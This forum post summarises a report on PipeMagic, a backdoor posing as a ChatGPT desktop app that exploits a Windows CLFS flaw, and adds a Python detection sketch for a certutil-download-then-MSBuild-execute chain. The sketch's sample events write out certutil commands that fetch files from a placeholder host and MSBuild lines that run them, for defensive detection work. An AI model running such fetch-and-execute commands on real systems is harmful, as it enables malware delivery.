PipeMagic Malware Imitates ChatGPT App to Exploit Windows Vulnerability and Deploy Ransomware
Posted: Sun Aug 24, 2025 7:53 am
The PipeMagic malware, attributed to the financially motivated threat actor Storm-2460, illustrates how cyber threats continue to evolve. It poses as the legitimate open-source ChatGPT Desktop Application from GitHub.
This sophisticated modular backdoor facilitates targeted attacks by exploiting CVE-2025-29824, an elevation-of-privilege vulnerability in the Windows Common Log File System (CLFS).
Microsoft Threat Intelligence identified PipeMagic during investigations into attack chains where adversaries used certutil to download a malicious MSBuild file from compromised legitimate websites, leading to in-memory execution of the backdoor.
https://gbhackers.com/pipemagic-malware ... atgpt-app/
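A detection sketch for the chain described above (certutil fetching a file from a URL, then MSBuild running that file on the same host), added here as an example and not taken from the article or from Microsoft. The event layout, the sample events and the 10-minute correlation window are constructed assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed process-creation events (host, time, image, command line); not real telemetry.
EVENTS = [
    ("WS01", "2025-08-24T07:00:00", "certutil.exe",
     r"certutil -urlcache -split -f https://site.example/a.proj C:\Users\Public\a.proj"),
    ("WS01", "2025-08-24T07:00:40", "MSBuild.exe",
     r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Users\Public\a.proj"),
    # Benign: certutil hashing a local file, MSBuild building an unrelated project.
    ("WS02", "2025-08-24T07:05:00", "certutil.exe", r"certutil -hashfile C:\tmp\setup.exe SHA256"),
    ("WS02", "2025-08-24T07:06:00", "MSBuild.exe", r"MSBuild.exe C:\src\app\app.csproj /t:Build"),
    # Download and build are 90 minutes apart: outside the default window.
    ("WS03", "2025-08-24T08:00:00", "certutil.exe",
     r"certutil -urlcache -f http://site.example/b.xml C:\ProgramData\b.xml"),
    ("WS03", "2025-08-24T09:30:00", "MSBuild.exe", r"MSBuild.exe C:\ProgramData\b.xml"),
]

URL = re.compile(r"https?://\S+", re.I)
PATH = re.compile(r"[A-Za-z]:\\[^\s\"]+")
WINDOW = timedelta(minutes=10)  # assumed correlation window, tune per environment

def find_chains(events, window=WINDOW):
    """Return (host, path) pairs where MSBuild runs a file certutil fetched from a URL."""
    downloads = {}  # (host, lowercased path) -> time of the certutil download
    hits = []
    for host, ts, image, cmd in sorted(events, key=lambda e: e[1]):
        when = datetime.fromisoformat(ts)
        name = image.lower()
        if name == "certutil.exe" and URL.search(cmd):
            # certutil was handed a URL: remember each local path on its command line
            for p in PATH.findall(URL.sub("", cmd)):
                downloads[(host, p.lower())] = when
        elif name == "msbuild.exe":
            for p in PATH.findall(cmd):
                seen = downloads.get((host, p.lower()))
                if seen is not None and when - seen <= window:
                    hits.append((host, p))
    return hits

if __name__ == "__main__":
    for host, path in find_chains(EVENTS):
        print(f"ALERT {host}: MSBuild executed certutil-downloaded file {path}")
```

Matching on the file path ties the two processes together, so routine certutil or MSBuild use on its own does not alert.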